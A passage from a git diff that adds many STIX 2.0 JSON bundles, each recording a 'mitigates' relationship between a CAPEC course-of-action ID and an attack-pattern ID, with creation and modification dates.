"bundle", + "id": "bundle--6857040b-5ef2-4f91-811a-0156ed62a1fc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e74697e0-2f05-4c6e-aee7-ce34e30ac2a0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526", + "target_ref": "attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--e9aa7abb-e935-4be6-8e9f-cd6c1f042120.json b/capec/relationship/relationship--e9aa7abb-e935-4be6-8e9f-cd6c1f042120.json new file mode 100644 index 0000000000..21db36c67e --- /dev/null +++ b/capec/relationship/relationship--e9aa7abb-e935-4be6-8e9f-cd6c1f042120.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--04f3b3ec-3839-4762-8916-0aad71902389", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--e9aa7abb-e935-4be6-8e9f-cd6c1f042120", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5a3e396c-2570-4ed5-9da8-0583ffc0cb73", + "target_ref": "attack-pattern--6b71d1a3-f57c-4c58-83c7-a7c44c55ab2d", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ea2abd6b-96e4-435c-a8dd-b19f7bce8721.json b/capec/relationship/relationship--ea2abd6b-96e4-435c-a8dd-b19f7bce8721.json new file mode 100644 index 0000000000..3215772d8d --- /dev/null +++ b/capec/relationship/relationship--ea2abd6b-96e4-435c-a8dd-b19f7bce8721.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--dc855e6b-f52f-49a1-99d3-996944fdd44c", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ea2abd6b-96e4-435c-a8dd-b19f7bce8721", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--c1177fe7-2157-4379-b994-7102720779ab", + "target_ref": "attack-pattern--3b4c8912-4371-45f9-abb4-02072ae7d2bf", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ea3cdbc2-1ee8-412f-8053-7535c1ee1e7b.json b/capec/relationship/relationship--ea3cdbc2-1ee8-412f-8053-7535c1ee1e7b.json new file mode 100644 index 0000000000..f78e7ceabc --- /dev/null +++ b/capec/relationship/relationship--ea3cdbc2-1ee8-412f-8053-7535c1ee1e7b.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8fb2b200-fdc7-4440-897a-24f63cdd6aa9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ea3cdbc2-1ee8-412f-8053-7535c1ee1e7b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--4fc7792e-2ac1-4852-aab4-e7894a72ad89", + "target_ref": "attack-pattern--bddad79c-d5bb-431e-96f2-7c5db95e1132", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ea719cfb-76a9-4d7d-9224-274811c7d7ac.json b/capec/relationship/relationship--ea719cfb-76a9-4d7d-9224-274811c7d7ac.json new file mode 100644 index 0000000000..408b3850bf --- /dev/null +++ b/capec/relationship/relationship--ea719cfb-76a9-4d7d-9224-274811c7d7ac.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--81526bd3-9031-4408-8d2e-255a5ab6a224", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ea719cfb-76a9-4d7d-9224-274811c7d7ac", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5a524e70-22d0-4145-bb4b-534316b6ba77", + "target_ref": "attack-pattern--fb1ce762-688f-4564-bcaf-533020ef079c", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ea844e99-746b-4c68-91c3-e9b33a0de653.json b/capec/relationship/relationship--ea844e99-746b-4c68-91c3-e9b33a0de653.json new file mode 100644 index 0000000000..487a7d732a --- /dev/null +++ b/capec/relationship/relationship--ea844e99-746b-4c68-91c3-e9b33a0de653.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7d46fcaa-6734-4e81-b281-ff80e49e8c5b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ea844e99-746b-4c68-91c3-e9b33a0de653", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3d674156-684a-44c3-b792-cacca604475c", + "target_ref": "attack-pattern--88412154-e5dd-4b58-b8d1-c143f7f925e5", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--eaca4f22-bac1-4cc3-8e40-2ee1dd484078.json b/capec/relationship/relationship--eaca4f22-bac1-4cc3-8e40-2ee1dd484078.json new file mode 100644 index 0000000000..22b98cc029 --- /dev/null +++ b/capec/relationship/relationship--eaca4f22-bac1-4cc3-8e40-2ee1dd484078.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7a600713-cb05-4a46-8143-cb8da72c1813", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--eaca4f22-bac1-4cc3-8e40-2ee1dd484078", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ff8b5661-c55b-41a8-9267-9d3718ecaa03", + "target_ref": "attack-pattern--9779126e-8180-45f2-befc-2fe8434d1724", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--eae7fdc2-a9a8-4d5e-9a24-769a58a5cdc0.json b/capec/relationship/relationship--eae7fdc2-a9a8-4d5e-9a24-769a58a5cdc0.json new file mode 100644 index 0000000000..91d425f18d --- /dev/null +++ b/capec/relationship/relationship--eae7fdc2-a9a8-4d5e-9a24-769a58a5cdc0.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--bbdeae39-cc67-4be2-bae9-2fb2143d69f7", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--eae7fdc2-a9a8-4d5e-9a24-769a58a5cdc0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b59904ff-7f32-486a-bd46-227d69e072fa", + "target_ref": "attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--eb359e19-953c-4676-b70c-7988d4e41952.json b/capec/relationship/relationship--eb359e19-953c-4676-b70c-7988d4e41952.json new file mode 100644 index 0000000000..8513b07500 --- /dev/null +++ b/capec/relationship/relationship--eb359e19-953c-4676-b70c-7988d4e41952.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--ac7d0d51-5d6d-4198-8833-6fe5d76facce", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--eb359e19-953c-4676-b70c-7988d4e41952", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--3961c98f-bbcb-4b45-8a65-b5a2e37909cf", + "target_ref": "attack-pattern--c29999db-082a-4dff-b420-73f324a13bc1", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--eb3a7a0f-6512-45a1-a711-855fa3d9856c.json b/capec/relationship/relationship--eb3a7a0f-6512-45a1-a711-855fa3d9856c.json new file mode 100644 index 0000000000..5ceeeac615 --- /dev/null +++ b/capec/relationship/relationship--eb3a7a0f-6512-45a1-a711-855fa3d9856c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--a9a0c222-6534-473c-96cf-01380b951465", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--eb3a7a0f-6512-45a1-a711-855fa3d9856c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--53739b65-3b71-4ed3-b31a-28ab1b090551", + "target_ref": "attack-pattern--9e9ffae0-b1d1-4680-b729-8c2b7677d2f6", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--eba54b7c-685e-4917-a4d8-2ad388f9d918.json b/capec/relationship/relationship--eba54b7c-685e-4917-a4d8-2ad388f9d918.json new file mode 100644 index 0000000000..8aec5c7999 --- /dev/null +++ b/capec/relationship/relationship--eba54b7c-685e-4917-a4d8-2ad388f9d918.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--1e0c4ee0-5c46-4270-92e6-3c61a6d1f680", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--eba54b7c-685e-4917-a4d8-2ad388f9d918", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--b8c7d2ba-edaa-44e3-b9a2-64c34bd02f28", + "target_ref": "attack-pattern--3d863e50-08bf-40ac-9cb1-a847dd37cd0e", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ebb70aa9-33c4-45e4-9139-554675520760.json b/capec/relationship/relationship--ebb70aa9-33c4-45e4-9139-554675520760.json new file mode 100644 index 0000000000..e97b37fb6a --- /dev/null +++ b/capec/relationship/relationship--ebb70aa9-33c4-45e4-9139-554675520760.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8e696b06-e7f4-472b-ba40-0d6b39895669", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ebb70aa9-33c4-45e4-9139-554675520760", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--e1aa6f73-a3a5-4981-92dd-f324834cd257", + "target_ref": "attack-pattern--1408a566-eced-4d5d-aa0d-a7b373e80ea6", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ec559739-62b4-400d-b852-db5c7a71f248.json b/capec/relationship/relationship--ec559739-62b4-400d-b852-db5c7a71f248.json new file mode 100644 index 0000000000..a6ddf813ee --- /dev/null +++ b/capec/relationship/relationship--ec559739-62b4-400d-b852-db5c7a71f248.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--7c762abd-b98d-41e2-a71b-436e1b1264d0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ec559739-62b4-400d-b852-db5c7a71f248", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1da47c6c-e10f-4276-bbe6-582f7fc465ab", + "target_ref": "attack-pattern--66352194-a1a9-4654-bb38-ae96b0bb824a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ec9fd5bc-7801-4acd-bcd5-18947ec8d217.json b/capec/relationship/relationship--ec9fd5bc-7801-4acd-bcd5-18947ec8d217.json new file mode 100644 index 0000000000..854c96dd2e --- /dev/null +++ b/capec/relationship/relationship--ec9fd5bc-7801-4acd-bcd5-18947ec8d217.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--8eb2c044-1e9e-4362-b1de-da555da06c47", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ec9fd5bc-7801-4acd-bcd5-18947ec8d217", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--4f26db10-8931-420a-9894-08ba87d842af", + "target_ref": "attack-pattern--7a90f137-ad2f-4c28-b951-0cfcd2e30adb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--eca6e1f0-5c98-4ae9-8052-e029952bbe26.json b/capec/relationship/relationship--eca6e1f0-5c98-4ae9-8052-e029952bbe26.json new file mode 100644 index 0000000000..249fe5aa80 --- /dev/null +++ b/capec/relationship/relationship--eca6e1f0-5c98-4ae9-8052-e029952bbe26.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d50aa86d-b61b-45df-99f9-2dad320e5e16", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--eca6e1f0-5c98-4ae9-8052-e029952bbe26", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--aebeb944-089d-4f75-825e-35491ce299d5", + "target_ref": "attack-pattern--dd79f192-635b-43ef-96d2-17548fa8c917", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ecc3568c-6e06-473e-b126-2c18dec93b5d.json b/capec/relationship/relationship--ecc3568c-6e06-473e-b126-2c18dec93b5d.json new file mode 100644 index 0000000000..c3679adbc1 --- /dev/null +++ b/capec/relationship/relationship--ecc3568c-6e06-473e-b126-2c18dec93b5d.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--78c14b21-7b48-4f76-8da3-87dc14d9f9ee", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ecc3568c-6e06-473e-b126-2c18dec93b5d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--bdadfed6-ab7b-490a-bfe9-fa4f27416e89", + "target_ref": "attack-pattern--80de694a-0a84-40b1-9c56-ec04747ca485", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ed190e5e-e0e7-458b-8f5b-c30d9de7993a.json b/capec/relationship/relationship--ed190e5e-e0e7-458b-8f5b-c30d9de7993a.json new file mode 100644 index 0000000000..4aaf2adf0e --- /dev/null +++ b/capec/relationship/relationship--ed190e5e-e0e7-458b-8f5b-c30d9de7993a.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--d6e8a64f-032e-415e-8974-387c0215d1e9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ed190e5e-e0e7-458b-8f5b-c30d9de7993a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a89e71f1-3b1c-426f-976b-18c965d09cf4", + "target_ref": "attack-pattern--e6e6beaa-2218-4ec6-8bd7-06ca242bbbe8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ed20bf5f-6738-4a0d-be2a-9a43fc2b397c.json b/capec/relationship/relationship--ed20bf5f-6738-4a0d-be2a-9a43fc2b397c.json new file mode 100644 index 0000000000..2d79c6cdb6 --- /dev/null +++ b/capec/relationship/relationship--ed20bf5f-6738-4a0d-be2a-9a43fc2b397c.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--b1a32566-ce3e-40bf-819c-9553722b7e86", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ed20bf5f-6738-4a0d-be2a-9a43fc2b397c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--652fe724-beaf-4db6-9b95-acbaeb383650", + "target_ref": "attack-pattern--ed51bcb1-2870-463d-accc-eb68408be81a", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ed61e4e1-5489-4563-9d23-1866ea877661.json b/capec/relationship/relationship--ed61e4e1-5489-4563-9d23-1866ea877661.json new file mode 100644 index 0000000000..7d0b437043 --- /dev/null +++ b/capec/relationship/relationship--ed61e4e1-5489-4563-9d23-1866ea877661.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--6adf4950-6e1c-45c4-8599-184dffcb3d99", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ed61e4e1-5489-4563-9d23-1866ea877661", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--eb3f9c77-2496-47fd-ba75-584b9bcf5b65", + "target_ref": "attack-pattern--6cb0e050-2567-4733-8766-aaeb09172ed2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--edd38d2f-4f92-4c3a-9d39-82a5810b2cd5.json b/capec/relationship/relationship--edd38d2f-4f92-4c3a-9d39-82a5810b2cd5.json new file mode 100644 index 0000000000..92dd38eae4 --- /dev/null +++ b/capec/relationship/relationship--edd38d2f-4f92-4c3a-9d39-82a5810b2cd5.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--c11bce90-ed42-4663-84d0-cea2b51fd0e2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--edd38d2f-4f92-4c3a-9d39-82a5810b2cd5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--a96d9ccc-8454-4b63-853f-1cfd142e970c", + "target_ref": "attack-pattern--d1dc8643-ccf6-4261-b4a2-132e7929a537", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ede2474f-657d-48e4-a372-3ac38faf2123.json b/capec/relationship/relationship--ede2474f-657d-48e4-a372-3ac38faf2123.json new file mode 100644 index 0000000000..40d6a31b0f --- /dev/null +++ b/capec/relationship/relationship--ede2474f-657d-48e4-a372-3ac38faf2123.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--da3b1ca8-05db-4a05-90e9-e1e6cdfd63d0", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ede2474f-657d-48e4-a372-3ac38faf2123", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--847153ab-45d7-433c-877d-91be6e450830", + "target_ref": "attack-pattern--540d669a-0e46-435c-8cc3-99bf7526ba20", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ee78fdd8-4fe3-4b08-8cca-cbccb81b05cf.json b/capec/relationship/relationship--ee78fdd8-4fe3-4b08-8cca-cbccb81b05cf.json new file mode 100644 index 0000000000..a81face0f7 --- /dev/null +++ b/capec/relationship/relationship--ee78fdd8-4fe3-4b08-8cca-cbccb81b05cf.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f2fb3d9e-ffdb-4f43-8765-30e728311eec", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ee78fdd8-4fe3-4b08-8cca-cbccb81b05cf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5d27eaef-7db0-4804-958c-8b5624bbd8af", + "target_ref": "attack-pattern--a511fff6-fe2b-4888-974d-265002b6ddac", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ef120778-1411-4dba-ae54-ead16af74f16.json b/capec/relationship/relationship--ef120778-1411-4dba-ae54-ead16af74f16.json new file mode 100644 index 0000000000..cf45cd24a9 --- /dev/null +++ b/capec/relationship/relationship--ef120778-1411-4dba-ae54-ead16af74f16.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--be49bdc7-9a29-4a16-9520-74a8506d5c03", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ef120778-1411-4dba-ae54-ead16af74f16", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--428b6c2b-e7be-46d9-b273-7e70511208da", + "target_ref": "attack-pattern--8b552dc6-db57-4f64-a436-cc7577c9eac9", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--ef36ffdd-7029-4bef-93d9-67a65dd90444.json b/capec/relationship/relationship--ef36ffdd-7029-4bef-93d9-67a65dd90444.json new file mode 100644 index 0000000000..205b302c0c --- /dev/null +++ b/capec/relationship/relationship--ef36ffdd-7029-4bef-93d9-67a65dd90444.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--36a2b07b-3939-4b98-8879-48827f1138ef", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--ef36ffdd-7029-4bef-93d9-67a65dd90444", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9bbc211a-2869-4a0e-bb81-0e2f64c91c73", + "target_ref": "attack-pattern--2c3069bb-826c-469e-a7be-57ade8c0b7b4", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--efacb91b-c8b4-4a7d-b2b4-b9f74851d2ba.json b/capec/relationship/relationship--efacb91b-c8b4-4a7d-b2b4-b9f74851d2ba.json new file mode 100644 index 0000000000..478898b7d3 --- /dev/null +++ b/capec/relationship/relationship--efacb91b-c8b4-4a7d-b2b4-b9f74851d2ba.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--4cb8995a-429e-4364-9e3e-e414b5fde262", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--efacb91b-c8b4-4a7d-b2b4-b9f74851d2ba", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--24d6271d-29ca-41d8-baf7-e74c5a8d438c", + "target_ref": "attack-pattern--b20c5bf0-63ce-4908-996a-673a572420f8", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--efe380b7-2bc1-4a1a-8bbd-cf79afddb8e8.json b/capec/relationship/relationship--efe380b7-2bc1-4a1a-8bbd-cf79afddb8e8.json new file mode 100644 index 0000000000..7cbabf9dc2 --- /dev/null +++ b/capec/relationship/relationship--efe380b7-2bc1-4a1a-8bbd-cf79afddb8e8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--3aecafd5-f327-4095-8d46-5d9114d31885", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--efe380b7-2bc1-4a1a-8bbd-cf79afddb8e8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--925956b6-2678-4433-9afe-3074a2ec9305", + "target_ref": "attack-pattern--2b15bd31-9fa4-4ff4-9986-75f61cf72186", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f01e1863-7f77-4d86-a3dd-42542b82e1f8.json b/capec/relationship/relationship--f01e1863-7f77-4d86-a3dd-42542b82e1f8.json new file mode 100644 index 0000000000..381b06a489 --- /dev/null +++ b/capec/relationship/relationship--f01e1863-7f77-4d86-a3dd-42542b82e1f8.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--10c5a4bf-6125-4c22-a61b-8a0c4cbb0a49", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f01e1863-7f77-4d86-a3dd-42542b82e1f8", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2017-01-06T00:00:00.000Z", + "modified": "2017-01-06T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--9473c9f9-f260-4e7d-bbf6-bc227db41261", + "target_ref": "attack-pattern--9e330dfb-4bb5-4c37-8982-c931dbc285cb", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f044155f-cc90-402f-8a90-33dfa66446c3.json b/capec/relationship/relationship--f044155f-cc90-402f-8a90-33dfa66446c3.json new file mode 100644 index 0000000000..355bb91543 --- /dev/null +++ b/capec/relationship/relationship--f044155f-cc90-402f-8a90-33dfa66446c3.json @@ -0,0 +1,20 @@ +{ + "type": "bundle", + "id": "bundle--f8f6ffa2-efcd-424f-8564-7e8cfba1bc8f", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--f044155f-cc90-402f-8a90-33dfa66446c3", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--07e21b68-7c17-480a-88fb-094ddecb93bc", + "target_ref": "attack-pattern--44a6a1b7-f688-4213-b4e2-1811bcaecbc2", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/relationship/relationship--f0562beb-5a29-416e-bdec-f1c183db6237.json b/capec/relationship/relationship--f0562beb-5a29-416e-bdec-f1c183db6237.json new file mode 100644 index 0000000000..042ecf0993 --- 